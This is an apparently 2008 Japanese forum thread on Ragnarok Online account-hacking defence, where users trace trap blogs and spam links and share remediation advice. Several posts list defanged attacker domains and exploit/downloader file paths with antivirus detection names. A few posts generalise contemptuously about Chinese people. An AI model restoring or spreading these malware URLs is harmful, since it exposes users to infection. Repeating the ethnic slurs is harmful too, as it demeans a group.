【　ネットカフェの利用の有無　　　】無
【　　　 OS　　】 WindowsXP HOME EDITION WITH SP2
【使用ブラウザ】 IE6
【WindowsUpdateの有無】更新済み
【　アンチウイルスソフト】 McAfee
【その他のSecurty対策】無
【ウイルススキャン結果】カスペルスキーオンラインスキャンにて5個C:\Documents and Settings\　\Local Settings\Temporary Internet Files内で検出
【スレログやテンプレを読んだか】ざっと読んだ程度
【hosts変更】　不明
【PeerGuardian2導入】無
【説明】
上記のブログを見に行って画像を開いたところでマカフィーが反応。
トロイはブロックされたようです。
続いてカスペのオンラインスキャンをしたところ、上記のフォルダに5つ検出したので全て削除済み。
現在再度オンラインスキャン中。
一応携帯でパスワード変更済み。
これ以降、スキャンで出てこなくても隠れて悪さをすることは考えられるでしょうか？
リカバリー出来たらしたいのですが、諸事情により出来ません。 <> （○口○*）さん<>sage<>08/08/22 17:13 ID:tSn0ThLt0<> www■teamerblog■com/blog/
かなり古いからIEのキャッシュ削除で終了じゃない? <> （○口○*）さん<>sage<>08/08/22 20:47 ID:R0WVyMve0<> 先日改竄を受けたXREA系サイトで被害再発。
>>874のスレから引用。

353 名前：黒魔メモの人 [sage] 投稿日： 2008/08/22(金) 20:07:36 ID:1dgPtflc
スクリプトが仕込まれていたので修正しました。
報告してくれた方ありがとうございました。

今回仕込まれたのはindex.phpで、
pukiwiki.phpは触られた形跡がありますが
怪しい点はありませんでした。

・前回からの変更点
FTPパスは変更済み
ccessで以下のflag?をoff、いくつかのIPをdenyで制限
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off

他に対策をご存じの方居ましたら教えて頂けると有り難いです…ｏｒｚ <> （○口○*）さん<>sage<>08/08/22 20:59 ID:5Cr1XtVn0<> >>878
PHPのエラーメッセージを出る状態で放置してた人間が言うのもなんですが・・・。
対策を行わないとXREAの場合PHP5はエラーメッセージをはいてしまうようです。

>>868のようなssでも貧スレWikiのルートパス等完全に相手の手の内に判り
攻撃のヒントすら与えている状態です。

あのssはモザイクがかかってるのでかろうじてユーザアカウントががわからないのですが
やろうと思えば貧スレWikiのクラックは可能と思います。
サーバーとアカウント名がわかるXREAのユーザアカウントはたぶん入れてしまうんじゃないかと思います。

サーバー移動しか方法がないかもしれません。 <> （○口○*）さん<>sage<>08/08/22 21:59 ID:6xJ0hwHI0<> php.iniに手が出せない場合には、.htaccessにディレクティブを追加するのが手っ取り早いか。
一例としては、こんな感じで。
> php_flag display_errors off
> php_value error_log "/virtual/{username}/logs/php_error.log"

>>879
XREAも、以前のようにマスタータンが直々に管理していた時代と、今の外部委託投げっぱなしの現状は、まるで別物と
考えた方が良いかもしれません。
zmxのように無料サービス自体を撤廃するレンタル鯖も珍しくないですし。 <> （○口○*）さん<>sage<>08/08/22 22:02 ID:GrAVodmM0<> >>876の奴はかなり以前から存在している中華のパクリブログのようだ。
全く同名、同一自己紹介のブログがFC2に存在しておりこちらは現在も更新されている。

”RO★Cafe　姫神ゆず”で検索すると、オリジナルと876のパクリブログが出る。
パクリブログのブログ管理者名はいかにも中華な　gguuyag　だし。

エキサイト運営への通報が妥当。
まだまだこう言うパターンのパクリブログは地雷の如く残っているだろう。
（これはと思ったブログをマークし、数日後にパクリブログ開設、その時点での最新記事をパクって罠を仕込んでいく手口)
その例を一つ、中身は同じだからタイトルと書いた時間。
【オリジナル】
SSでお楽しみください。　　2007/12/18（Tue）22:38　

【中華パクリ】
SSでお楽しみください。　by gguuyag | 2007-12-19 18:08

ともあれ気をつけてくれよな！ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/22 22:46 ID:+PX3vLnU0<> >>871
確認しましたー。ありがとうございます。 <> （○口○*）さん<>sage<>08/08/22 23:36 ID:LeMm3o4t0<> XREAはもうダメなんじゃないかとすら思えてくる。
職スレあたりクラックされたら被害甚大だな…。 <> （○口○*）さん<>sage<>08/08/22 23:41 ID:5Cr1XtVn0<> >>883

職スレ以外もありますしねー。
といってもいくつか他のサーバ（サクラの再販等）も同じような状態らしいので
移住サーバーにも実は困る状態というのが現状ですね。 <> （○口○*）さん<>sage<>08/08/23 00:42 ID:LztQAW7a0<> 絶対安全なんてところはもうないだろう
何処でも狙われたら危険性をもつサイトに変わるしね <> （○口○*）さん<>sage<>08/08/23 15:58 ID:Qn/HI2mf0<> exciteいって>>881のブログ通報してきた。
だいぶ放置っぽいね <> （○口○*）さん<>sage<>08/08/23 22:13 ID:xasVReh40<> Windows更新したあとに再起動したら
カスペルのFWがrundll32.exeに反応したんだけど
これって許可しちゃっていいのかな <> （○口○*）さん<>sage<>08/08/23 22:26 ID:ZR0nzABA0<> そりゃ、ファイルが更新されてたら警告出すだろ。

WindowsUpdateで更新した覚えがあるなら許可。
いつどこで更新したか記憶がないなら禁止。 <> （○口○*）さん<>sage<>08/08/23 22:37 ID:xasVReh40<> なるほど
勉強になりました
ありがとう！ <> （○口○*）さん<>sage<>08/08/24 02:22 ID:00uwA+Yz0<> 告知ツッコミスレに爆撃

-----------------------------
325 名前：(^ー^*)ノ～さん MAIL: 投稿日：08/08/24 01:40 ID:scTbnZyg0
ROの小説やイラストを公開しております。
2次職が活躍する小説と転生職が活躍する小説を連載中です！
サイトリニューアルしましたので是非お越しを～
http://yaplog■jp/kaosatu/
-----------------------------
327 名前：(^ー^*)ノ～さん MAIL:sage 投稿日：08/08/24 02:21 ID:xEp0jDJX0
>325はアカハックアドレスなので注意

yaplog■jp/kaosatu/
--->www■infosueek■com/ff11diary
----->www■infosueek■com/xin/Ms06014tt■htm
----->www■infosueek■com/xin/Ms06046tt■htm
----->www■infosueek■com/xin/Yahoott■htm
----->www■infosueek■com/xin/Ms07004tt■js
----------------------------- <> （○口○*）さん<>sage<>08/08/24 04:11 ID:4rZXREnU0<> xia.exeか…6月製造の化石だなぁ。 <> （○口○*）さん<>sage<>08/08/24 11:33 ID:Bo3yWvaR0<> チラ裏に貼られていたもの

857 （○口○*）さん New! 08/08/24 11:01 ID:fJeVjjp90
”最近のボットの動向／情勢教えて！”の回答集(以前RO内にてご質問した分)
http://yaplog■jp/siinya/

iframeでhttp://www■infosueek■com/ff11diary
以下同上だね <> （○口○*）さん<>sage<>08/08/24 12:20 ID:JH8TGYXU0<> 最近FF11関連が人気だな <> （○口○*）さん<>sage<>08/08/24 14:56 ID:+NnfJRk60<> >>892
コメント自体は年初から爆撃で使われているようだよ。
ブログ記事のタイトルパクった中華のテンプレコメントってことだね。
これを検索、一番最初に原文が出る。
””最近のボットの動向／情勢教えて！”の回答集(以前RO内にてご質問した分)”
残りは皆爆撃コメ、と。
当初はinfosueek直接記述だったみたいだね。

ヤプログの方はやっぱりプロフィール欄の下の細長い線があるね。OperaとFirefox3だと見えるよ。
殆どの奴はお人好しな程に無警戒だからこんなコメントにも引っかかるんだろうな。
しばらくすると足跡返しコメントが来るぜ。
他の中華ヤプログでもそれこそ気軽に足跡返しコメントのこしてる奴もいるし。
これだけ無警戒なら1年くらい前のパクリコメントでもハックが簡単、中華ウハウハで止められないぜ。
ヤプログの他の中華ブログも通報して半月はたったが未だに削除すらされない、こりゃもうダメだね。

気を付けてくれよな! <> （○口○*）さん<>sage<>08/08/25 00:46 ID:S5/BU9To0<> >893
中華がFFに切り替えてるから、ROは以前よりは平和になったと言える。
今のFFのハク被害の状況は、2年程前のROの時に近いし。
ゲームが衰退しないと被害が減らないってのは、やるせないけどね。

ただ来月予定のログイン方式切り替えに伴って、ROでも激増する可能性は
否定できないし、どうなるか戦々恐々と言った所じゃない？ <> （○口○*）さん<>sage<>08/08/25 02:05 ID:eiF/NGAM0<> ROで成果が出せなくなったんだろうね
間接的にはBOTを継続して潰すことが出来た結果とも言える

BOTがダメ→垢ハクも成績悪し→撤退 <> （○口○*）さん<>sage<>08/08/25 02:40 ID:gdgFF1tp0<> FFユーザーの脇の甘さも、業者につけ込まれる要素かな。
PCでしかプレイできず、今まで積み上げてきた様々な安全確保のTipsが有効に活かされていたゲーム。
それに対して、コンシューマハードでプレイすることも可能で、比較的限られた層だけがPC環境をゲームプレイに用いていた、
それ以外の情報Wikiサイトや公式コミュニティサイトだけをPCで閲覧するようなユーザーも多いゲーム。
この間に意識差が無かったとは言えないだろう。

あとは、FFで鯖移動サービスが有料オプションとして可能になったのも無関係とは言えない要素。
釣り上げたアカウントの中身を、より高値で処分できる鯖へ移転させることが珍しくない。費用は抜かれた側持ちで。 <> （○口○*）さん<>sage<>08/08/25 13:38 ID:DNJ/hdoH0<> そういえば「Flash最新版の導入を促すFlash」って無いね
あればいいのに <> （○口○*）さん<>sage<>08/08/25 16:43 ID:dluFaQ9y0<> Webログイン移行で別な観点から要注意な事がありますね。
「簡単!!一発!!自動ログイン　ﾏｼﾞｵﾇﾇﾒ→　ROランチャー」
なんてツールが出てくるかもしれないので、
PC初心者の方は便利そうだからと迂闊に手を出さないように
注意が必要かと思います。

現状、IE6↑以外はサポート対象外というだけで、IEエンジン使った
癌公式にしか繋がらない自作ブラウザをランチャーとして使用するのは、
（ブラウザとは何かという定義の問題になってしまうので）
不正ツールに該当しないような気配が有りますが、その辺りの油断を狙って
こういったツールにID・パス抜き仕込まれたら一巻の終わりでしょう。

実際中華がそんな事を仕掛けて来るかどうかは解りませんが、
くれぐれも御注意下さいまし。 <> （○口○*）さん<>sage<>08/08/25 17:26 ID:PRB79Owr0<> ランチャーツールより
ガンホーからのメールを装って
「重要なお知らせがあります。下記URLよりアトラクションセンターにログインして投稿確認をお願いします。」とか書いて
フィッシングURL「http://www■gang-ho■co■jp/login.php」とか書いてあれば
結構お手軽にヤバイんじゃね？ <> （○口○*）さん<>sage<>08/08/26 06:51 ID:xwzUiE140<> XREA、ハックアドの挿入が再発してるという情報があがってきてる。
（2chレン鯖板XREAスレ839/同人板XREAスレ198）

有料版でも駄目、htmlのみでも駄目、運営の出した対策でも再発。
ここまで問題が解決しないとなると、XREAは本気で駄目な気が。
こんなんじゃFWで弾くってのもそのうち冗談で済まなくなる気すらする。 <> （○口○*）さん<>sage<>08/08/26 07:20 ID:uu4Ln3/Z0<> >>901
FFIXの被害サーバーの一部がさくらの再販ってところまで含めると
XREAだけといえないのも事実
XREAも含めるとCOREも…ってなっていくとサーバーレンタル資金の
都合での閉鎖を宣言するサイトも出てきかねないぞ。

CORE、XREAだから出来るようなことをしてるサイト見られるし
実際CRONを使ってると思わしきサイトもある。
（思わしきではなく95％以上CRON使用と断定できるが）

他にもPHP.iniの問題等課題が残るサーバーではあるけど

結局は>>885
そしてサイト管理側の現実と本音は>>884 <> 886<>sage<>08/08/26 09:59 ID:Q/Vt106c0<> >>881　のサイトについてexciteから返信　調査の後対応する　とのこと
どのような対応をしたかは知らせませんがご了承くださいってメールきました。
該当ページにいったら消去されてた <> （○口○*）さん<>sage<>08/08/26 10:00 ID:hmlpe0bJ0<> アカウントハック対策・セキュリティ総合スレ住人の自称詳しい方々、こんなところまで
きて知識自慢とか恥ずかしいからやめてくださいね＾＾； <> （○口○*）さん<>sage<>08/08/26 10:00 ID:hmlpe0bJ0<> ｺﾞﾊﾞｰｸ <> （○口○*）さん<>sage<>08/08/26 10:01 ID:lR1Rp8Yd0<> わざとだろ
わざとだろ <> （○口○*）さん<>sage<>08/08/26 10:04 ID:W7YyE3CE0<> xreaスレか？ｗ <> （○口○*）さん<>sage<>08/08/26 12:59 ID:9zIEU39J0<> 予想通りxreaスレにかいてあったなｗ <> （○口○*）さん<>sage<>08/08/26 14:51 ID:PuIjZdY50<> KcrnaeghDrv.dll
Trojan-GameThief.Win32.OnLineGames.svyr

こんなの出てきた
どう見たってアウトですよね・・・ <> （○口○*）さん<>sage<>08/08/26 14:53 ID:OEpZy4R80<> はい。 <> （○口○*）さん<>sage<>08/08/26 15:03 ID:1gm3rYG60<> そろそろ、テンプレの相談時期かな？
なんか変更が必要な箇所あったっけ？ <> （○口○*）さん<>sage<>08/08/26 16:42 ID:1gm3rYG60<> 129 （○口○*）さん 08/08/26 16:25 ID:qew6OVW50
自分の支払い方法の詳細を見ると載ってます
http://panterorr■com/blog-entry

隔離スレに貼られていた内容

http://panterorr■com/blog-entry/　でないとアクセスに失敗するｗ
http://www■k5dionne■com/ffxmmi　　　iframeで呼びだされるページも同じく末尾の/抜け。

http://www■k5dionne■com/ma/Ms06014■htm
http://www■k5dionne■com/ma/ani■c
http://www■k5dionne■com/ma/Yahoo■htm
http://www■k5dionne■com/ma/xia■exe

おなじみのアドレス＋ファイル名ですな
blog-entry : Trojan-Downloader.JS.Agent.cid
ffxmmi : Trojan-Downloader.HTML.IFrame.dv
Ms06014.htm : Trojan-Downloader.JS.Psyme.kf
ani.c : Exploit.Win32.IMG-ANI.ac
Yahoo.htm : Exploit.HTML.IESlice.z
xia.exe : Trojan-Downloader.Win32.Delf.jfj <> （○口○*）さん<>sage<>08/08/27 01:43 ID:1sU0i7Kc0<> 中華、その手のミス多いなぁ
お陰で助かってる面もあるので、じゃんじゃんミスして欲しい所だが <> （○口○*）さん<>sage<>08/08/27 01:49 ID:5tuMbigy0<> MMOBBSだけじゃなく、2chのネトゲ板や
ネットwatch板ほかも爆撃してるな <> （○口○*）さん<><>08/08/27 02:40 ID:srUfsDxE0<> 中華でなくてもディレクトリを/で終わらせないのはよくあるミス。 <> （○口○*）さん<>sage<>08/08/27 03:12 ID:eNsb9UL20<> HTTPで表記する場合、ディレクトリ末尾には/をつけないといけない。
でも忘れることが多いので、実用的な対策はとられている。
一般にはディレクトリ末尾の/を省略すると末尾に/を補完した
URLに向けたパスへのMovedと扱われるけど、このときに補完された
URLって「Apacheが『俺のURLとパスはこれだ！』と思ってるURL」
なんだよね。

ちなみに１つだけ例外があって、document rootになってるパスの
場合だけは/を省略できる。

○http://www.example.com/path/of/dir/
×http://www.example.com/path/of/dir
○http://www.example.com/
○http://www.example.com

豆知識な。 <> （○口○*）さん<>sage<>08/08/27 04:41 ID:srUfsDxE0<> 1番目のは dir というディレクトリを指定している。
2番目のは dir というファイルを指定している。
→ dir というファイルは無いけど、ディレクトリならあるよとサーバーが教えてくれる。
4番目は、ブラウザが自動的に/を付けてくれる。

例外なんて、覚えない方が良いのですよ。 <> （○口○*）さん<>sage<>08/08/27 07:34 ID:uBjtVN/r0<> >>912
8月9日登録の福建中華ドメインな、取得後間もなく大規模爆撃。
panterorr■com の検索結果約 5,570 件

登録地、IPが天津(tj)になっているのが目新しい。
成都支部、香港支部に続いて天津支部が出来たのかもしれんね。

登録日とかつての罠コメントから、ソ連の対日参戦日を選んだと思うよ。
movie1945だったかでソ連が日本を云々という罠コメを張りまくっていたことがある。
【こういうの】
ソビエト赤い軍隊によるGuandong日本の敗北実質映像 www■movie1945■com/keis/

気を付けてくれよな！ <> （○口○*）さん<>sage<>08/08/27 07:40 ID:zTemp5Gp0<> 同じアドだけど少し手段違い
こちらも隔離スレ

764 名前：名無しさん＠ｺﾞｰｺﾞｰｺﾞｰｺﾞｰ！[] 投稿日：2008/08/26(火) 23:01:49 ID:FB0Nw8gr0
http://panterorr■com/dfsqras■jpg
ネタだよな？

こっちは偽装jpg <> （○口○*）さん<>sage<>08/08/27 14:04 ID:5tuMbigy0<> 960 名前：名無しさん＠お腹いっぱい。：2008/08/27(水) 13:17:05 ID:j6EXibF7
Q5、冒険者アカデミーってなに？
A5、つい最近出来た初心者にやさしい学校だ!街に入ると自動的にマップに+のマークがつく。そこへ行きNPCに話しかけ冒険者アカデミーへ。
　　様々な特典があり便利でレベルアップもできてノービス脱却も早いよ。
　　受付を済ませ「プロン」「アルディ」「フェイ」の話を聞くとJOB2うｐ。（この時点で9/10にはなってるはず）　　
　　これだけでもう転職ができるぞ!便利な世の中になったもんだｗｗｗｗｗｗｗｗｗｗ
　　この他に先に進むとNPC「ミッド」から「アカデミー入学生帽子」がもらえる
　　簡単なクエストもあるから転職したらクエストをやってみよう。NPC「ルーン」に話しかければクエストができる
　　クエストを進めると便利な装備を貰えるからガンガンやっとけお!

Q6、金たまらNEEEEEEEEEEEEEEEE!
A6、wikiにもあるが「作成」に使われる収集品を集めると金になる。「毒ビン」「コンバーター」「アルケミスト製薬品各種」に　
　　使われるの物を調べてそのモンスターを狩るようにしとけ。経験と金銭が儲かる狩場を自分で探せ。カードを狙うのあり

Q7、起動したけどサーバーが一つしかないぞコラ
A7、そっちはウルド。デスクにないならプログラムファイルから開いて男の顔のアイコン「Ragnarok.exe」をクリック汁。

VIPROが何となく分かるFLASH
http://www■livedoorm■com/blog■htm <> （○口○*）さん<>sage<>08/08/27 14:13 ID:tMhXjE4c0<> 昨日から複数の隔離スレに垢ハック張られてるな・・・
オリンピック終わったから、また本業に力入れ始めたか <> （○口○*）さん<>sage<>08/08/27 14:43 ID:H4+PIXCI0<> 管理スレに削除依頼出すのも忘れずにな <> （○口○*）さん<>sage<>08/08/27 20:28 ID:0hlad3+t0<> >>921
最近多いなと思ったらそういうことか
どうしようもねー民族だな <> （○口○*）さん<>sage<>08/08/27 20:39 ID:eNsb9UL20<> ああ。オリンピックやってたのか。 <> （○口○*）さん<>sage<>08/08/28 11:16 ID:c3nClgpB0<> 宇宙ステーションがマルウェアに感染
http://www.itmedia.co.jp/enterprise/articles/0808/28/news023.html

>感染したのはオンラインゲームのパスワードを盗み出すマルウェアだった
吹いた <> （○口○*）さん<>sage<>08/08/28 11:56 ID:96MiOCzr0<> >「なぜ宇宙へ持っていく前にウイルスチェックをかけておかなかったのか」とクルーリー氏は疑問を呈している。
に同意。 <> （○口○*）さん<>sage<>08/08/28 13:46 ID:+rJR+tD00<> Live OneCareは垢ハックウイルスへの対応はいいのかな？
最近検出テストの順位がいいから気になるなー <> （○口○*）さん<>sage<>08/08/28 14:14 ID:96MiOCzr0<> 物によるからなんとも。 <> （○口○*）さん<>sage<>08/08/28 14:19 ID:c3nClgpB0<> 対応の早さで見るのが良いと思うんだけれど、そう言う情報ってよっぽど自信がなければ
すすんでアピールしたりはしないよね。 <> （○口○*）さん<>sage<>08/08/28 16:50 ID:+rJR+tD00<> そうなのかーThx
ちょうど今使ってる先生が期限切れるから乗り換えてみよっかな <> （○口○*）さん<>sage<>08/08/28 18:14 ID:w5Y9dLop0<> 企業向けセキュリティー製品“Forefront”シリーズ
ttp://ascii24.com/news/i/soft/article/2006/11/24/print/666064.html
>ロシアZAO Kaspersky Lab社の“Kaspersky”

MSですら、自社エンジン単独運用を諦めて、Kasperskyのエンジン提供を受けるようになっているし。

ttp://www.itmedia.co.jp/enterprise/articles/0707/13/news012.html
ttp://www.microsoft.com/japan/users/onecare/2/01.mspx
OneCareも、GeCadから買収したエンジンを諦めて、Kasperskyベースになっているのかもしれない。 <> （○口○*）さん<>sage<>08/08/28 19:12 ID:tggW6mUW0<> 現状のカスペの欠点は、ダウンロードだな。
ROのクライアントをダウンロードするとどんどん重くなっていく。

リアルタイムスキャンをその時だけ切れば良いんだけれどね。 <> （○口○*）さん<>sage<>08/08/28 19:21 ID:/zASNYwX0<> カスペエンジン一色に染まると、それはそれで危険だなぁ
今でも中華はカスペを抜けるように試行錯誤してるのに。

OneCareは見つけるがカスペは見逃した、ってケースも結構あったし
MSには独自で頑張って欲しいものだ…… <> （○口○*）さん<>sage<>08/08/28 19:34 ID:96MiOCzr0<> ForefrontとOneCareは全くの別物。 <> （○口○*）さん<>sage<>08/08/28 19:58 ID:tggW6mUW0<> >>833
大事なのはあくまで「対応速度」だと思うんだ <> 935<>sage<>08/08/28 19:58 ID:tggW6mUW0<> アンカーずれすぎた＼(＾o＾)／
>>933宛ね <> （○口○*）さん<>sage<>08/08/28 20:15 ID:gsci11iK0<> >935
過去に2桁ちょいカスペに検体を送ってるが、それは逆に言えば
他ので検出するのにカスペでは見逃してた、という事。

確かにカスペ検体送ってからの対応の早さは凄いものがある。
しかし誰かが検体を送らなければ対応が遅くなるし、検体を送る場合
根拠とするのはVTの結果で、つまり他の検出結果。

カスペ一色に染まると危険というのは、こういう意味。 <> （○口○*）さん<>sage<>08/08/28 20:41 ID:UeHQYi5S0<> でも他のやる気無さは異常だろ… <> （○口○*）さん<>sage<>08/08/28 21:29 ID:8fsqTYMd0<> USBメモリで感染か：宇宙ステーションがマルウェアに感染 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0808/28/news023.html
＞感染したのはオンラインゲームのパスワードを盗み出すマルウェア

垢ハックウィルスもついに宇宙規模にｗ

>>937を見て、生物の多様性の話を思い出した。 <> （○口○*）さん<>sage<>08/08/28 21:42 ID:96MiOCzr0<> >>925 <> （○口○*）さん<>sage<>08/08/28 21:44 ID:8fsqTYMd0<> >>927-の話に気を取られて見落としてたｗ
指摘thx <> （○口○*）さん<>sage<>08/08/28 22:59 ID:rXqu4cYU0<> ROを作動させるとカスペがこんなことを言うんだが

プロセスは、ドライバをインストールしＯＳへの完全な
アクセス権を獲得しようとしています
そうするとセキュリティのコントロールができなくなります　詳細_

疑わしい動作
Sduspicious Driver installaion

プロセスを実行します
C:\Grvity\RagnarokOnline...\GameMon.des

→許可
→拒否
→信頼ゾーンへの追加 <> （○口○*）さん<>sage<>08/08/28 23:02 ID:uk8ZEzkc0<> おめでとう。
君のカスペ君は正常に動作しているようだ。 <> （○口○*）さん<>sage<>08/08/28 23:04 ID:rXqu4cYU0<> >>943
とどのつまりこれって何？

Ａ1．垢ハクウィルス

Ａ2．ROがOSへの完全なアクセス権を必要とするゲーム <> （○口○*）さん<>sage<>08/08/28 23:17 ID:ycfXs8Tj0<> RO(のnProtect)がOSへの完全なアクセス権を必要とするゲーム <> （○口○*）さん<>sage<>08/08/28 23:22 ID:rXqu4cYU0<> なるほど…つまり

アカウントハックという可能性も当然あるけれど
ＲＯをプレイする限り付きまとう害のないメッセージでもある、と認識しといていいかな <> （○口○*）さん<>sage<>08/08/28 23:34 ID:tggW6mUW0<> ジャイアンみたいなヤツがいるんだが、どうする？
でも縛り付けたらROは動かんよ。みたいな。 <> （○口○*）さん<>sage<>08/08/29 00:36 ID:iIh2oE0n0<> nProが生成するdump_wmimmc.sysがカーネルドライバなので、それに対しての振る舞いだな。
x64なwindowsだと、署名の無いドライバとしてイベントログに毎回記録されているけど。 <> （○口○*）さん<>sage<>08/08/29 03:14 ID:3i50urm80<> ２ちゃんの隔離スレに貼られてた

http://antersd38fc2■com/blog-entry

2008年８月９日登録のFC2モドキドメイン
Aguseによると
検出されたウイルス（ワーム、スパイウエア）
Trojan-Downloader.JS.Agent.cid

らしい。 <> （○口○*）さん<>sage<>08/08/29 10:33 ID:Jql3PFGF0<> アプリコに貼られてた

151 名前：ヒール回復774さん[] 投稿日：2008/08/29(金) 10:23:31 ID:yAT9H4cg
遊戯王ＯＣＧレインボーダークドラゴンデッキ Yu-Gi-Oh！
TRADING CARD ...
fb/ ホームページの「遊戯王研究所」では、数十のデッキを
ご紹介しています。 ... 遊戯王OCG Yugi- ... 「カードキン
グダム」で検索して頂くと、他にもたくさんのデッキ解説動画
があります。すべて驚きのテクニック満載！ぜひ一度ご覧下さい。
この動画では【レインボーダークドラゴン】の１ターンキルコン
ボを解説しています。デッキ解説記事はこちら。
ttp://www■excite-blog■com/keyword/d0808033566_5linmovesmm2■rar
ホームページの「遊戯王研究所」では、数十のデッキをご紹介し
ています <> （○口○*）さん<>sage<>08/08/29 11:24 ID:Ac9k3OkZ0<> >>949の踏んだぽいな・・・・
カスペOnlineでスキャンしたらIEキャッシュの中に残ってて
キャッシュ消した後はHITしなかったんだが

これって大丈夫？
activXは切ってた <> （○口○*）さん<>sage<>08/08/29 12:05 ID:ndtIJKeX0<> 大丈夫？といわれてもたぶんとしか言いようない
いつ感染したのか、活動済みなのかもわからんし <> （○口○*）さん<>sage<>08/08/29 12:09 ID:kfB5vpl60<> 保証なんて誰にもできないよ。OS再インストールコースいってらー <> （○口○*）さん<>sage<>08/08/29 12:12 ID:YUj6/QUg0<> >>949
k5(略) >>912 。
MS06-14(MDAC、WindowsUpdateで阻止可能)
アニメーションカーソル(WindowsUpdateで阻止可能)
Yahoo!メッセンジャー(入れていなければ阻止可能。アップデートがあるかどうかは知らない)
>>951
ということで判断できないならリカバリ。
もっとも物凄く古いのでノーガードでもなければ検知するはず。
ttp://www.virustotal.com/analisis/eaaea8c0c8f965c81b6cbee108a6534e

>>950
こちらもノーガードでなければ検知するはず。
ttp://www.virustotal.com/analisis/75397ec6fed0b7ce4a47d32746d5d656
AutoRunだからUSBメモリなどに寄生するタイプか。 <> （○口○*）さん<>sage<>08/08/29 12:16 ID:Ac9k3OkZ0<> ああすまない少し焦ってたようだ
たまたまこのとき常駐ソフト使ってなかったからパニックになってしまった

URLクリックしたのはついさっき
クリック後即カスペスキャン
キャッシュにあったTrojan-Downloader.JS.Agent.cidを削除
その間～現在までにRO関連はログインしてないな
ZAがクリックした時間に66.160.206.164へのアクセスを弾いてた
ActiveXは切ってる。Javaはついてたが・・・・

なにぶん初めてでどうしていいやら・・・・ <> （○口○*）さん<>sage<>08/08/29 12:23 ID:Ac9k3OkZ0<> まぁ疑わせしはリカバリだな、それは分かってたがｗ

すまんありがとう
いい機会だし再インストいってくるわ <> （○口○*）さん<>sage<>08/08/29 12:49 ID:k3lHE3Ql0<> まあどうしてもってんなら、
1. 複数オンラインスキャンでチェックする
2. とりあえずそのPCでログインをしないでおく
3 少し日が経ってから再チェックする
4. 検出されなければまあ大丈夫だろう <> （○口○*）さん<>sage<>08/08/29 13:43 ID:iIh2oE0n0<> >>954
Yahoo!メッセンジャーに関しては以下の通り。
ttp://messenger.yahoo.co.jp/notice.html
ログインした時に古いバージョンだと警告されるようだし、そもそも脆弱性問題のあった頃のバージョンは、サポート終了で
現在はログインする事が不可能ぽいから、現役で使っているユーザーなら心配は無さそう。
逆に、以前は使っていたものの、今では塩漬けでインストールされたまま放置しているユーザーだと危ない。 <> （○口○*）さん<>sage<>08/08/29 16:14 ID:IdXclpY60<> >>951
踏んだのはそれではないけど
ギルメンがmixiに貼られてた罠URL踏んで感染後、
カスペルの体験版落として発見・駆除したけど
結局その後知らない誰かにログインされてたから
安心しないほうがいい

その時はたまたまログイン現場に自分がいて、
即ギルメンに今インした？と連絡したから無事で済んだけどね <> （○口○*）さん<>sage<>08/08/29 16:29 ID:G9MetgNq0<> 本当活発化してきてるよね、他の板でも唐突に貼られてることが多くなった
んでちょっと早いけど>>970踏んだ人は次スレよろね <> （○口○*）さん<>sage<>08/08/29 17:22 ID:ndtIJKeX0<> やっぱオリンピックが終わったからなのかｗ <> （○口○*）さん<>sage<>08/08/29 19:58 ID:Y8c3GIoc0<> 質問です
家での垢ハクの心配はないのですが、今度ネカフェを利用したいとおもっています。

ネカフェではメダルを経験値に交換するだけなのですが
主要装備をひとつのキャラに集めておいて（商人など）
ネカフェでログインするのはそのキャラとは違うキャラでインすれば
たとえ垢ハクされてもアイテム等の心配はないのでしょうか？

帰ってからインしたキャラのキャラパスと念のためアトラクションＩＤを変更で
被害を受けないですむでしょうか？

よろしくおねがいします <> （○口○*）さん<>sage<>08/08/29 20:06 ID:G9MetgNq0<> 1.キャラパスが共通じゃない限りは万が一の時はセーフだと思う
2.家戻ったら垢パス変更しておくのはいいこと、万全といえるかな？

ネカフェのPCが感染していたと仮定して
仕掛けた側がいつ気付くかにもよるだろうし、帰るまでにやられる可能性もある <> （○口○*）さん<>sage<>08/08/29 23:15 ID:k3lHE3Ql0<> 家が安全だと仮定すれば、
ネカフェに行く前にPASSを変更して、
帰ってきてから戻せばいい <> 964<>sage<>08/08/29 23:16 ID:k3lHE3Ql0<> やられる可能性を言ってしまえば、ネカフェで遊べなくなるよ。 <> （○口○*）さん<>sage<>08/08/31 16:51 ID:cTXs4HKZ0<> 未だにネカフェから繋ぐ人なんているの？
そんなにみんなアカハクされたいの？？ <> （○口○*）さん<>sage<>08/08/31 17:30 ID:D56EXnDd0<> PeerGaurdian2日本語版って今DLできなくなってますか?
3日前ぐらいからずっと「ページを表示できません」になってしまう… <> （○口○*）さん<>sage<>08/08/31 18:17 ID:X1wGIXBb0<> >>856-859 <> （○口○*）さん<>sage<>08/08/31 19:28 ID:EH8+eBcJ0<> 最近、ラーメン板とか温泉板でハックＵＲＬが貼られたのを見たなぁ。
何がしたいんだろう。 <> （○口○*）さん<>sage<>08/08/31 19:38 ID:jRLpm3AX0<> 2ちゃん？
全く関係ないとこにもばら撒かれてるね
俺はゲーム音楽板で貼られてるの見たよ <> （○口○*）さん<>sage<>08/08/31 19:38 ID:RtnmXm230<> ネトゲに関連するキーワードで検索して掛かった所に
無差別でスクリプトが貼り付けまくってるだけだろうから、
スレ内の何かがHITしたんだろう。 <> （○口○*）さん<>sage<>08/08/31 20:13 ID:NxrsGHPx0<> 半角系に貼り付けたら引っかかる奴多そうだなw <> （○口○*）さん<>sage<>08/08/31 20:21 ID:Ktd2LGhS0<> 角煮に張られたら間違いなく踏む＼(＾o＾)／ <> （○口○*）さん<>sage<>08/08/31 21:05 ID:6ev6HvRa0<> PG2の開発が終わってしまったのなら、これを突く穴が見つかったら
けっこう大変だな。 <> （○口○*）さん<>sage<>08/08/31 21:10 ID:fA19ez3T0<> PG2って、開発が終了したからって穴が突かれるようなタイプのものか…？ <> （○口○*）さん<>sage<>08/08/31 21:30 ID:1aHY15Rr0<> あるとすれば、制限リストをダウンロードor更新する所に
オーバーフロー関係のバグがあるかどうかかな？ <> （○口○*）さん<>sage<>08/08/31 23:18 ID:Vda37QBg0<> それ以前にVista対応の正式公開版が存在しないんじゃ？
RC1版があるのは知ってるんだが。

自PCのOSをVistaに切り替え出来ん理由は幾つかあるが
うち１つがPG2だったりする…… <> （○口○*）さん<>sage<>08/09/01 01:00 ID:bwE8wygX0<> PG2そのものはオープンソースという形で公開されているのだから、攻撃されるような脆弱性が見つかった場合でも
有志による修正には一応期待できる。
